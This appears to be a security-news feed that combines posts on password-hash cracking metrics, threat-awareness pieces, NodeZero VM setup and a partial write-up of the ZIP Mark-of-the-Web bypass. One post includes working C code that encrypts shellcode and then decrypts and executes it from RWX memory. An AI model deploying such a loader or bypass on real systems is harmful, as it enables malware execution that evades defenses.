Reading view

There are new articles available, click to refresh the page.

Metrics That Matter: An Attacker’s Perspective on Assessing Password Policy

After compromising a Windows domain controller, one of the actions that NodeZero, our autonomous pentest product, performs is dumping all domain user password hashes from the Active Directory database. This is a common attacker technique, and the resulting dump is highly valuable to attackers. But did you know that this data is a great source of insight for defenders too?

In this post we’ll talk about different metrics NodeZero gathers from analyzing password hashes in the Active Directory database. You’ll see how these metrics can be used to gauge how susceptible your organization is to common attacks that take advantage of weak passwords: password cracking, password spray, and credential re-use. These metrics can then be used as a lever to adjust password policy, improving the long-term cyber resilience of your organization.

Credential Analytics

Password Cracking Metrics

After dumping password hashes from a domain controller, NodeZero attempts to crack them all. This cracking is done without the need to set up dedicated hardware (i.e. GPUs). NodeZero uses a regularly updated wordlist containing billions of potential passwords, including all publicly disclosed breached passwords. NodeZero also tries to crack hashes based on contextual terms such as a company’s name and domain names.

If NodeZero is able to crack any hashes for active users, NodeZero will surface a weakness entitled Weak or Default Credentials - Cracked Credentials from Active Directory Services Database (NTDS).

The proof for this weakness will contain a summary report with metrics covering:

  • Number and percentage of users whose password hashes were cracked

  • Number of cracked accounts broken down by user status (enabled or disabled)

  • Number of cracked accounts broken down by cracking method (empty password, based on username, known breached password, or using a contextual term).

  • Number of cracked accounts broken down by password length

  • Number of cracked accounts with passwords appearing in the list of the top 100, top 1000, and top 10000 worst known passwords

Also included in the proof is the list of active accounts whose passwords were cracked and the methods used to crack them.

Password Similarity Metrics

In addition to hash cracking, NodeZero analyzes the data dump for password reuse: cases where different users are using the exact same or similar passwords. If at least two active users are found to be using the exact same or similar password, NodeZero surfaces a weakness entitled Password Reuse Found in Active Directory Services Database (NTDS).

Password reuse analysis can be done even if no passwords are cracked. Password hashes are dumped from the Active Directory database in NTLM format, which are unsalted MD4 hashes of the passwords. This means that two accounts with the same NTLM hash are using the same password.

If NodeZero is able to crack any password hashes, it goes one step further in its analysis. It compares cleartext passwords with each other to see how similar they are based on the normalized edit distance metric. If two cleartext passwords are at least 70% similar, then NodeZero presumes that an attacker would be able to guess one password from the other.

For instance, suppose we’re comparing two cleartext passwords: Horizon3 and Horizon1!. The edit distance between these two passwords is 2, because 2 modifications are required to turn the first password into the second.

  1. Horizon3 → Horizon1 (replace 1 with 3)

  2. Horizon1 → Horizon1! (add !)

Based on this, NodeZero determines that these two passwords are ~78% similar – close enough for an attacker to easily guess.

Using this type of analysis, NodeZero surfaces the following metrics in the proof for the Password Reuse weakness.

  • Number and percentage of active users using a password similar to another user

  • Worst case and average age password reuse “blast radius

    • This is a novel metric NodeZero surfaces to indicate the number of additional accounts that can be compromised if a single account is compromised. NodeZero assumes an attacker can simply take a compromised password or simple variation of it and attempt it against other accounts.

The top reused passwords are also provided in the proof.

Using Metrics to Gauge Attack Defense Readiness

Now let’s talk about how the metrics above can be used to assess an organization’s susceptibility to different types of attacks.

Defending Against Password Spray Attacks

In a password spray attack, an attacker starts with a list of users and a shortlist of probable weak passwords. The attacker tries (i.e. “sprays”) each password, one at a time, against all users in an attempt to compromise at least one account. Attackers are just trying to take over any account because they know that, once they’ve compromised a single account, they can abuse that account’s access to go further into the network. Password spray attacks are carried out both for initial access and lateral movement.

To avoid account lockouts, attackers usually perform password sprays over long periods of time, limiting the rate of login attempts. Suppose an attacker has a shortlist of 10000 passwords and is spraying at a rate of 4 attempts per hour. It would take the attacker more than a 100 days to complete the spray. This means, to defend against password spray attacks, it’s most important to eliminate any easily guessable passwords that would make an attacker’s shortlist to spray. Even if a password hash is cracked, it doesn’t mean it’s easily guessable – it could be entry number 100,000,000 in a breached password list, and an attacker won’t realistically have the time to attempt that password.

So the metrics that matter most for guarding against password spray attacks are:

  • # Accounts cracked with passwords that appear in the list of top 10000 known worst passwords

  • # Accounts cracked with passwords that are derived from a user’s username

  • # Accounts cracked with passwords derived from a contextual term such as a company name

  • # Enabled accounts with empty passwords

Weak passwords in all of the above categories are ones attackers can easily come up with to generate a shortlist for spraying.

Defending Against Password Cracking Attacks

In a password cracking attack, an attacker has a password hash in hand and seeks to crack it to recover the cleartext. An attacker typically acquires hashes after initial access through attacks such as OS credential dumping, Kerberoasting, or LLMNR/NBT-NS Poisoning.

It is generally hard to defend against password cracking because motivated attackers may have significant cracking hardware at their disposal. Cracking hardware has matured to the point now that an NTLM hash for any password 8 characters or less can be cracked within a few hours or less. There are even publicly available rainbow tables for all NTLM hashed passwords of 9 characters.

If NodeZero was able to crack any hashes at all, you can expect an attacker will also be able to crack them. It’s not unusual for NodeZero to crack more than 50% of an organization’s credentials.

The single best defense against password cracking attacks is to require long passwords. We recommend passwords at least 12 characters in length. This is more than NIST’s guidance of an 8 character minimum.

The metrics that matter most for defending against password cracking attacks are:

  • # Accounts cracked (total amount)

  • # Accounts cracked with password length < 12 characters

Defending Against Credential Reuse Attacks

In a credential reuse attack, an attacker starts with a compromised account and tries to take over other accounts by trying to login with the same password, or a similar password. This is typically carried out as part of lateral movement.

Organizations routinely have a common password or base term that is shared across many accounts. For instance, this base term could be derived from the password new users get when they first join an organization, or a temporary password used as part of a password reset, or a password used for test accounts.

If an attacker is able to compromise a single account using one of these common passwords, you can assume that all other accounts that share that password can also be easily compromised. An attacker may be able to significantly escalate his or her privileges depending on the level of access those additional accounts have.

The Password Reuse Blast Radius metric tracks the number of additional accounts that can be taken over if a single account is compromised. Below are the trackable metrics most useful to defend against the credential re-use attack technique.

  • Worst case password reuse blast radius

  • Average password reuse blast radius

It’s not uncommon for NodeZero to find hundreds of accounts sharing the exact same password or passwords derived from a single base term. Ideally all accounts should be using a unique and dissimilar password.

A Plan For Continuous Assessment and Improvement

The Metrics That Matter

The following chart summarizes the metrics gathered by NodeZero and how they can be used to assess your organization’s posture against different types of attacks.

Attack Type

MITRE Tactic Alignment

Metric

Password Spray

Initial Access
Lateral Movement
Credential Access

# Accounts cracked with passwords that appear in the list of top 10000 known worst passwords

# Accounts cracked with passwords that are derived from a user’s username

# Accounts cracked with passwords derived from a contextual term such as a company name

# Active accounts with empty passwords

Password Cracking

Lateral Movement
Credential Access

# Accounts cracked (total amount)

# Accounts cracked with password length < 12 characters

Credential Reuse

Lateral Movement
Credential Access

Worst case password reuse blast radius

Average password reuse blast radius

 

Horizon3’s Password Policy Recommendations

Based on the above, Horizon3 recommends the following organizational password policy. Our guidance extends and hardens the latest recommendations from NIST Special Publication 800-63B.

  1. All passwords must be 12 characters or longer
  2. No passwords matching the list of known breached passwords
  3. No passwords derived from dictionary terms
  4. No passwords derived from well-known contextual terms such as the company name, product, etc
  5. No passwords derived from well known information about the user such as the username, first name, or last name
  6. All passwords should be unique, and no passwords should be “too similar” to each other
There are a variety of tools to set and enforce password policy. For instance, if you’re using Azure AD, you can enable Azure AD Password Protection to automatically ban well-known bad passwords.

We recommend a program of continuously running NodeZero to verify your posture and adherence to password policy. NodeZero automatically surfaces the metrics in this post whenever it acquires domain admin rights, or if it’s set up to run with a domain admin credential. Check out the free trial here to learn more!

The post Metrics That Matter: An Attacker’s Perspective on Assessing Password Policy appeared first on Horizon3.ai.

Phobia

Reading Time: 9 minutes Ransomware Details Phobos ransomware, first discovered in December 2018, is another notorious cyber threat that targets businesses. Phobos is popular among threat actors of various technical abilities because of its simple design. In addition, the Greek god Phobos was thought to be the incarnation of fear and panic; hence the name Phobos was likely inspired […]

FBI Targeted by Russian Hackers in Latest String of Attacks Against U.S. Government Websites

ClearanceJobs: 11/18/22

“With the rise in successful cyber attacks against the United States government and its federal agencies, many are right to wonder whether the public sector’s approach to cybersecurity is in need of a serious change.”

Read the entire article here

The post FBI Targeted by Russian Hackers in Latest String of Attacks Against U.S. Government Websites appeared first on Horizon3.ai.

Cloud security isn’t guaranteed because a provider is well-known, expert says

SC Media: 11/14/22

Brad Hong, customer success manager at Horizon3ai, said he and his team constantly see huge blast radii in attacks and penetration tests originate from the smallest misconfiguration, or even lack of configuration, allowing attacker’s to simply log-in to public facing environments.

Read the entire article here

The post Cloud security isn’t guaranteed because a provider is well-known, expert says appeared first on Horizon3.ai.

Russian Software Found in Smartphone App Used by CDC and U.S. Army

ClearanceJobs: 11/14/22

“After being branded as an American company, the revelation of Pushwoosh being a Russian-originated software firm comes as yet another embarrassment to Apple and Google in the privacy domain,” explained Taylor Ellis, customer threat analyst at Horizon3ai.

Read the entire article here

The post Russian Software Found in Smartphone App Used by CDC and U.S. Army appeared first on Horizon3.ai.

Holiday Season Threat Awareness

As we approach the holiday season, it is important that our customers stay vigilant and continue a regular cadence of autonomous pentests. Although it’s the time of year for holiday cheer, we’ve seen cyber threat actors (CTAs) take advantage of lackadaisical company manning and low staff.

In September 2020, “the SolarWinds (major software company) hack, one of the biggest cybersecurity breaches of the 21st century” and was considered a highly lucrative target for CTAs based on its privileged access to IT systems. Specifically, the SolarWinds Orion IT monitoring software was targeted, allowing access to hundreds of thousands of organizations around the world to include portions of the US Government. Currently, nearly 30% of Horizon3 customers still use or have used SolarWinds applications in their networks, and two years later with 7% still finding the SolarWinds Orion API Authentication Bypass Vulnerability (CVE-2020-10148) in their pentests.

According to open-source research, below is the SolarWinds hack timeline:

Log4Shell: 2021’s worst holiday gift

Another example of a large-scale holiday season attack includes the Log4Shell remote code execution (RCE) vulnerability (CVE-2021-44228) that was surfaced right before Christmas in late 2021. On  December 9, 2021, this new vulnerability was discovered in the Apache Log4j open source library, which is used in most of the developed java applications. Due to the proliferation of Log4j in java, “the number of devices that could potentially be affected by the security vulnerability is approximately 2.5 – 3 billion.” CTAs can exploit a vulnerable application by sending a crafted user input to it, hoping that the application will log their arbitrary code as input and allow them persistent access, as well as lateral movement. One year later, 64% of Horizon3 customers using NodeZero are still experiencing the CVE-2021-44228 vulnerability in their environment.

According to open-source research, below is the Apache Log4j timeline:

  • December 9, 2021 – Original vulnerability disclosed and first patch (2.15.0) was made available
  • December 14, 2021 – Second vulnerability disclosed and second patch (2.16.0) was made available
  • December 18, 2021 – Third vulnerability disclosed and third patch (2.17.0) was made available
  • December 28, 2021 – Fourth vulnerability disclosed and fourth patch (2.17.1) was made available

At the end of the day, attackers care greatly that we want to take some time off and enjoy our families, because that is when we are at our weakest. CTAs use these “down times” to take advantage of low staffing and chaos surrounding the holidays to deploy new tactics, techniques, and procedures (TTPs), while also focusing on targets with the biggest bang for the buck.

Remaining vigilant throughout the holiday season will help ensure your systems and networks are secure, which is why adopting an autonomous approach to proactively finding those attack vectors can save your security team its most critical resource: time. Incorporating a regular pentest cadence will get you results quickly, so mitigations and verifications are timely, giving you much needed time to enjoy the holidays!

Albert Martinek is a Customer Threat Analyst with Horizon3.ai.

The post Holiday Season Threat Awareness appeared first on Horizon3.ai.

K-12 cybersecurity: Protecting schools from cyber threats | Guest Mike Wilkinson

Michael Wilkinson leads the digital forensics and incident response team at Avertium. The team is dedicated to helping clients investigate and recover from IT security incidents daily. Wilkinson talks about threat research, the threat of Vice Society, how K-12 cybersecurity can improve and much more.

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Digital forensics and incident response 
3:12 - Getting interested in computers
6:00 - How had digital forensics changed over the years
9:03 - Handling overwhelming amounts of data
12:53 - The threat of Vice Society 
17:20 - Why is Vice Society targeting K-12?
19:55 - How to minimize damage from data leaks
24:25 - How schools can improve cybersecurity
25:54 - What schools should do if cyberattacked 
31:36 - How to work in threat research and intelligence
34:42 - Learn more about Avertium
36:40 - Learn more about Mike Wilkinson
37:08 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

Higher Education Organization Improves Cybersecurity Posture with NodeZero

When the director of technology for a higher education organization went looking for a better way to identify and prioritize security weaknesses on the school’s servers and networks, his first interaction with Horizon3.ai and NodeZero started off with an impressive bang.

“I wanted to see proof of concept, and Horizon3.ai solved one of our biggest security holes because of that PoC,” or proof of concept, he says. On the first op, NodeZero was able to compromise the domain admin account.
Not just one account, in fact, but four, via an LLMNR vulnerability.

Without a lot of work, we were able to clean that up before we even licensed NodeZero – that was huge,
says their IT director.

Cybersecurity presents a complex challenge for the school, as it is spread out over several campuses and managed remotely. The director of technology is their highest-ranking technology staff member at the organization. The role oversees 400 endpoints within the organization, in addition to securing roughly 600 students on their own VLAN/Subnet during the school year.

NodeZero offers more specificity

Previous pentesting options were helpful, but often left the team chasing down vulnerabilities that turned out to not actually be exploitable.

“Often, it was just informational, and didn’t really affect your security,” he says.

With Horizon3.ai, “One of the things that really struck me was that it isn’t just the tool – and the tool is fantastic – but it’s the people around the tool who are available, in the chat, scheduling meetings. When I was running the PoV (Proof of Value) someone was there.”

He was also sold on NodeZero by its capability to run on demand.

“What sold me on it was seeing it at work and, because we know security is a journey and not a destination, the idea of being able to continuously run scans and pentests is great,” he says.

The team now runs weekly pentests to maintain vigilant cybersecurity on their network, he notes.

Getting the most from your time

Time management and focusing effort is huge in maintaining a strong security posture. Chasing down every lead with equal time and energy isn’t helpful when we know that not every vulnerability is actionable.

“You have critical down to informational severity issues, but I believe a tool a lot more when it says this is a critical misconfiguration we have compromised – oh and by the way, here’s your hashed password,” he says. “When that’s happened, I recognized the first and last character and knew that was the password.”

Context scoring based on critical impacts helps hammer home where to best deploy limited resources to secure
the environment.

“It’s the difference between casing a house and saying how I might be able to break in – that window might not be locked, that door doesn’t seem secure. But if you can actually break in, that’s critical. It’s the difference between telling me something might happen versus something did happen.”

Easy fixes but you need to find them first

While the LLMNR vulnerability wasn’t a huge challenge to fix, discovering it was a bit of a shock, the Director of Technology explains – and that’s why regular tests are so helpful. Security is so expansive it’s hard to cover everything.

“We try to work to secure our network, but it’s possible for any organization to miss things or have little holes” in their security, he says. A solution like NodeZero can find those small gaps that leave the organization open to risks so the team can shore them up quickly and easily.

“With stuff like LLMNR, the fix isn’t hard if you have the tools to fix a lot of machines at once,” he says. It’s identifying those risks in the grander picture that is the real struggle.
NodeZero helps uncover what you don’t know, he says, and tells you how to fix it so you don’t spend time researching the answer.

“You’re not chasing your tail following a large list of vulnerabilities,” he says. “It cuts down the task of securing your network because you’re starting at the critical, most impactful things. You get a view of things you just aren’t going to have without a pentest.”

Since starting to incorporate NodeZero into their security profile, other features, such as external pentesting, have been released and added to the solution’s usefulness.

“There’s a lot of tools out there that just hand you the tool and you’re on your own,” he says.

“The support, being able to set up a time to answer a question, it’s all been helpful. They work with us as opposed to saying ‘We got ‘em, on to the next account.’”

Download as PDF

The post Higher Education Organization Improves Cybersecurity Posture with NodeZero appeared first on Horizon3.ai.

NodeZero Host Virtual Machine

The NodeZero Host virtual appliance is a small virtual machine based on a pre-configured Ubuntu 20.04 installation. It’s designed to execute NodeZero pentests and bundles tools that facilitate pentest execution, as well as debug and maintenance.

Downloads

IMPORTANT:Always verify that the files you download come from Horizon3.
VMWare / VirtualBox importable OVA
download
sha2567e1489f394a3d5d0c3d89916c2b6d5bea8e9df0fbed6cbfd45b8f5c0132cfae1

Specs

The NodeZero virtual machine comes pre-configured to use these resources:

  • 2 x CPUs
  • 8GB of RAM
  • 40GB of disk
  • Bridged network adapter

Installation

Installing the virtual machine is a matter of importing the OVA file from the download link above into your virtualization environment. We provide the following set of steps as an example to use with VMWare’s vSphere client or with VirtualBox.

VMWare vSphere

vSphere client is one of VMWare’s virtual environment management solutions. You can find more information on the client itself in VMWare’s documentation.

NOTE:The following steps are for vSphere client version 7.0.3.00500.

After downloading and verifying the most recent NodeZero-####.ova file from the downloads section above, follow these steps to import and launch the NodeZero virtual machine.

  1. Log into your VMWare vSphere client.
  2. Select Deploy OVF Template from the Actions menu.
  3. Select the Local File option
  4. Click the UPLOAD FILES button to locate the OVA file downloaded in step #1.
  5. Click Next.
  6. Give your VM a name if you want it to be different from the default, and select a location to deploy to.
  7. Click Next.
  8. Select the compute resources you’ll be using.
  9. Click Next.
  10. Verify the import settings are correct and that the signature is from Horizon3.
  11. Click Next.
  12. Select the storage destination.
  13. Click Next.
  14. Select a network to use.
  15. Click Next.
  16. Review your selections
  17. Click Finish.
  18. To launch the VM, select it from the list on the left and click the Power On button.

VirtualBox

After downloading and verifying the most recent NodeZero-####.ova file from the downloads section above, follow these steps to import and launch the NodeZero virtual machine.

  1. Open VirtualBox.
  2. Click on Tools.
  3. Click on Import.
  4. Enter the location of the OVA file.
  5. Click Continue.
  6. Click Import wait for it to complete.
  7. Make sure you use a bridged network adapter:
    • Select the newly imported NodeZero virtual machine from the list on the left.
    • Click Settings.
    • Click Network.
    • Check that Attached to: says Bridged Adapter.
    • Check that Name: is the name of the adapter connected to your internal network.
    • Click OK if you had to change anything.
    • NOTE:There are known issues with VirtualBox network bridges over wireless adapters in newer MacOS versions. If you’re experiencing connectivity problems, consider using a wired connection instead.
  8. Select the NodeZero virtual machine from the list on the left.
  9. Launch the VM by clicking Start.

Usage

Connecting

If using vSphere, once you power on the virtual machine, the client interface gives the option of using a web console or a remote console for your first login.

If using VirtualBox, after starting the VM, a new display window appears that shows the operating system load screen.

With either system, once the OS fully loads, you’ll see a login screen that looks like this:

Username and First Login

When first launching the NodeZero virtual machine, SSH password access is disabled until you login and update the default password.

  1. Login with these credentials:
    • Username: nodezero
    • Password: nodezero
  2. When successful, you’ll see a prompt like the one below:
    You are required to change your password immediately (administrator enforced)
    Changing password for nodezero.
    Current password:
  3. Enter the password from step #1 and hit enter.
  4. Next you’ll see a prompt for New password:, enter a secure password that you’ll use from now on and hit enter.
  5. Next you have to confirm the password Retype new password:, enter the same password from step #4 and hit enter.
  6. You are now logged in with a successful password change. Make sure to keep that password for use in the future.

Once the login process completes, you’ll see an Enabling SSH password authentication message. At this point you can continue working through the vSphere or VirtualBox consoles, but you can also use an SSH client to connect to the IP address shown on the login screen.

Using SSH

To connect over SSH with Linux or MacOS, simply run the command below, replacing IP_ADDRESS with the one shown in the login screen.
$ ssh [email protected]_ADDRESS

If you’re using Windows, then you’ll use a client like PuTTY to connect. Simply fill out the Host Name (or IP Address) field with the address shown in the login screen.

Configuration with the n0 command

This virtual machine comes with a simple script that helps adjust basic settings and other maintenance tasks. It’s available under the n0 command, and running it presents you with a menu:

$ n0
1) Check environment
2) System info
3) Configure Static IP
4) Configure network proxy
5) Update
6) Version info

The following sections provide more information on what these options do.

Network configuration

Options #3 and #4 in the n0 command menu allow you to adjust network settings as follows.

Switching between DHCP and Static IP assignment

By default the NodeZero applicance comes with DHCP enabled. But if you need to switch to static addressing, you can use option #3 and follow the prompts to configure a new IP address, Subnet, Gateway and DNS nameserver.

If you ever need to switch back to DHCP, you can use the same option.

Configure a network proxy

You’re also able to setup a proxy server for HTTP and HTTPS traffic. Simply select option #4 and follow the example in the prompt when entering the URL. Note that you’ll have to log out and back in before this change takes effect.

Checking things are working

Option #1 of the n0 command menu checks that the system is ready to execute a pentest. It verifies we have access to the correct amount of resources and the right commands. It’s the same as running the Host Check Script.

Option #2 provides system information and can serve as a way to check your current settings. You’ll find details on the processors, memory, disk and network configuration.

Running a NodeZero pentest

  1. Log into the Horizon3 web portal
  2. Schedule a new pentest following your usual process.
  3. Copy and paste the launch / curl command from the portal into the shell of a NodeZero virtual machine.
  4. Pentest starts executing.

Staying up to date

You can use the n0 command menu’s option #5 to perform an OS and tools update.

The post NodeZero Host Virtual Machine appeared first on Horizon3.ai.

Behind the scenes of ransomware negotiation | Guest Tony Cook

Tony Cook of GuidePoint Security knows a lot about threat intelligence and incident response. But he’s also used these skills while working in ransomware negotiation! Cook has handled negotiations for all the big threat groups — REvil, Lockbit, Darkside, Conti and more — and he told me about what a ransomware negotiator can realistically accomplish, which threat groups are on the rise, and why negotiating with amateurs is sometimes worse and harder than dealing with elite cybercriminals. 

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Ransomware negotiating 
2:42 - How Tony Cook got into cybersecurity
4:00 - Cook's work at GuidePoint 
9:31 - Life as a ransomware negotiator 
11:41 - Ransomware negotiation in 2022
13:52 - Stages of a successful ransomware negotiation 
15:23 - How does ransomware negotiation work?
19:11 - The difference between threat-acting groups
20:43 - Bad ransomware negotiating
22:43 - Ransomware negotiator support staff
25:21 - Ransomware research
26:26 - Is cyber insurance worth it? 
29:14 - How do I become a ransomware negotiator? 
32:25 - Soft skills for a ransomware negotiator
33:46 - Threat research and intelligence work
37:45 - Learn more about Cook and GuidePoint
38:17 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

Encrypting Shellcode using SystemFunction032/033

After a while, I’m publishing a blog post which made me interested. With the recent tweets about the undocumented SystemFunction032 Win32 API function, I decided to quickly have a look at it. The first thing I noted after Googling this function was the source code from ReactOS. Seems like other SystemFunctions from 001 got other cryptographic functions and hash functions. The SystemFunction032 is an RC4 implementation. This API is in the export table of Advapi32.dll

The export table entry points to the DLL Cryptsp.dll which actually has the function implemented and exported.

Inside the Cryptsp.dll as you can see the SystemFunction032 and SystemFunction033 point to the same offset, which means loading either of these functions will do the same RC4 encryption.

This is the disassembly of the function which does the RC4 encryption. It takes in the data and key structs as parameters.


Upon reviewing the ReactOS source code, it is quite straightforward to implement this in C and get our shellcode encrypted/decrypted.

I wrote a quick C program to encrypt a given shellcode.

#include 
#include 

typedef NTSTATUS(WINAPI* _SystemFunction033)(
	struct ustring *memoryRegion,
	struct ustring *keyPointer);

struct ustring {
	DWORD Length;
	DWORD MaximumLength;
	PUCHAR Buffer;
} _data, key;

int main() {
	printf("[*] RC4 Shellcode Encrypter using Systemfunction032/033\n");
	puts("[*] Coded by: @OsandaMalith - www.osandamalith.com");

	_SystemFunction033 SystemFunction033 = (_SystemFunction033)GetProcAddress(LoadLibrary(L"advapi32"), "SystemFunction033");

	char _key[] = "www.osandamalith.com";

	unsigned char shellcode[] = {
		0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x29, 0xD4, 0x65, 0x48, 0x8B,
		0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B,
		0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE,
		0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57,
		0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48,
		0x01, 0xF7, 0x99, 0xFF, 0xD7 };

	key.Buffer = (PUCHAR)(&_key);
	key.Length = sizeof key;

	_data.Buffer = (PUCHAR)shellcode;
	_data.Length = sizeof shellcode;

	SystemFunction033(&_data, &key);

	printf("\nunsigned char shellcode[] = { ");
	for (size_t i = 0; i 

Once the encrypted shellcode is obtained the below can be used to decrypt and execute the shellcode.

#include 
/*
 * RC4 Shellcode Decrypter using Systemfunction032/033
 * Coded by: @OsandaMalith - www.osandamalith.com
 */
typedef NTSTATUS(WINAPI* _SystemFunction033)(
	struct ustring *memoryRegion,
	struct ustring *keyPointer);

struct ustring {
	DWORD Length;
	DWORD MaximumLength;
	PUCHAR Buffer;
} _data, key;

int main() {
	_SystemFunction033 SystemFunction033 = (_SystemFunction033)GetProcAddress(LoadLibrary(L"advapi32"), "SystemFunction033");

	char _key[] = "www.osandamalith.com";
	
	unsigned char shellcode[] = {
		0x5f, 0xfc, 0xb3, 0x2c, 0x87, 0xd5, 0xc1, 0xe8, 0x2b, 0xac, 0x12, 0x8f, 0x00, 0x5e, 0xef, 0xd3,
		0xd6, 0x3a, 0x04, 0x80, 0x05, 0xa1, 0x43, 0x45, 0x6a, 0xce, 0x2c, 0xf9, 0x58, 0x0f, 0x34, 0xdf,
		0xf8, 0x8b, 0x78, 0x63, 0xb4, 0x7a, 0xba, 0x5d, 0xdf, 0x14, 0x4f, 0x6b, 0xbf, 0xcd, 0x04, 0x44,
		0x53, 0x2f, 0x35, 0x15, 0x75, 0x56, 0x6a, 0xb6, 0xab, 0xd3, 0x7b, 0xcc, 0x03, 0xb6, 0x16, 0x4f,
		0x4b, 0x30, 0x01, 0x57, 0x58, 0xd8, 0xd0, 0x0b, 0x0b, 0xa0, 0xa1, 0x66, 0x98, 0x83, 0x7e, 0xdb,
		0x0d, 0x1a, 0x08, 0x41, 0x62, 0x62 };

	key.Buffer = (PUCHAR)(&_key);
	key.Length = sizeof key;

	_data.Buffer = (PUCHAR)shellcode;
	_data.Length = sizeof shellcode;

	SystemFunction033(&_data, &key);

	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);

	EnumFonts(GetDC(0), (LPCWSTR)0, (FONTENUMPROC)(char*)shellcode, 0);
}

Penetration tester Horizon3.ai identifies Fortinet exploit source, assists those checking for potential attacks

SiliconANGLE: 11/02/22

“We want to be to have a tool that can be used to exploit our customer system safely to prove that they’re vulnerable, so then they can go and fix it,” said James Horseman (pictured, right), exploit developer at Horizon3.ai.

Read the entire article here

The post Penetration tester Horizon3.ai identifies Fortinet exploit source, assists those checking for potential attacks appeared first on Horizon3.ai.

Russia-Ukraine Conflict Heightens Wariness of Nation-State Attacks as 64% Of Businesses Believe They Have Been Targeted

CPO Magazine: 10/21/22

Well over half of the respondents not only believe that they have already been targeted by nation-state attacks, but have made changes to their cybersecurity practices due to the Russia-Ukraine conflict.

Read the entire article here

The post Russia-Ukraine Conflict Heightens Wariness of Nation-State Attacks as 64% Of Businesses Believe They Have Been Targeted appeared first on Horizon3.ai.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

In October 2022, I've come across a tweet from 5th July, from @wdormann, who reported a discovery of a new method for bypassing MOTW, using a flaw in how Windows handles file extraction from ZIP files.

So if it were a ZIP instead of ISO, would MotW be fine?
Not really. Even though Windows tries to apply MotW to extracted ZIP contents, it's really quite bad at it.
Without trying too hard, here I've got a ZIP file where the contents retain NO protection from Mark of the Web. pic.twitter.com/1SOuzfca5q

— Will Dormann (@wdormann) July 5, 2022

This sounded to me like a nice challenge to freshen up my rusty RE skills. The bug was also a 0-day, at the time. It has already been reported to Microsoft, without a fix deployed for more than 90 days.

What I always find the most interesting about vulnerability research write-ups is the process on how one found the bug, what tools were used and what approach was taken. I wanted this post to be like this.

Now that the vulnerability has been fixed, I can freely publish the details.

Background

What I found out, based on public information about the bug and demo videos, was that Windows, somehow, does not append MOTW to files extracted from ZIP files.

Mark-of-the-web is really another file attached as an Alternate Data Stream (ADS), named Zone.Identifier, and it is only available on NTFS filesystems. The ADS file always contains the same content:

[ZoneTransfer]
ZoneId=3

For example, when you download a ZIP file file.zip, from the Internet, the browser will automatically add file.zip:Zone.Identifier ADS to it, with the above contents, to indicate that the file has been downloaded from the Internet and that Windows needs to warn the user of any risks involving this file's execution.

This is what happens when you try to execute an executable like a JScript file, through double-clicking, stored in a ZIP file, with MOTW attached.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Clearly the user would think twice before opening it when such popup shows up. This is not the case, though, for specially crafted ZIP files bypassing that feature.

Let's find the cause of the bug.

Identifying the culprit

What I knew already from my observation is that the bug was triggered when explorer.exe process handles the extraction of ZIP files. I figured the process must be using some internal Windows library for handling ZIP files unpacking and I was not mistaken.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

ProcessHacker revealed zipfldr.dll module loaded within Explorer process and it looked like a good starting point. I booted up IDA with conveniently provided symbols from Microsoft, to look around.

ExtractFromZipToFile function immediately caught my attention. I created a sample ZIP file with a packaged JScript file, for testing, which had a single instruction:

WScript.Echo("YOU GOT HACKED!!1");

I then added a MOTW ADS file with Notepad and filled it with MOTW contents, mentioned above:

notepad file.zip:Zone.Identifier

I loaded up x64dbg debugger, attached it to explorer.exe and set up a breakpoint on ExtractFromZipToFile. When I double-clicked the JS file, the breakpoint triggered and I could confirm I'm on the right path.

CheckUnZippedFile

One of the function calls I noticed nearby, revealed an interesting pattern in IDA. Right after the file is extracted and specific conditions are meet, CheckUnZippedFile function is called, followed by a call to _OpenExplorerTempFile, which opens the extracted file.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Having a hunch that CheckUnZippedFile is the function responsible for adding MOTW to extracted file, I nopped its call and found that I stopped getting the MOTW warning popup, when I tried executing a JScript file from within the ZIP.

It was clear to me that if I managed to manipulate the execution flow in such a way that the branch, executing this function is skipped, I will be able to achieve the desired effect of bypassing the creation of MOTW on extracted files. I looked into the function to investigate further.

I noticed that CheckUnZippedFile tries to combine the TEMP folder path with the zipped file filename, extracted from the ZIP file, and when this function fails, the function quits, skipping the creation of MOTW file.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Considering that I controlled the filename of the extracted ZIP file, I could possibly manipulate its content to trigger PathCombineW to fail and as a result achieve my goal.

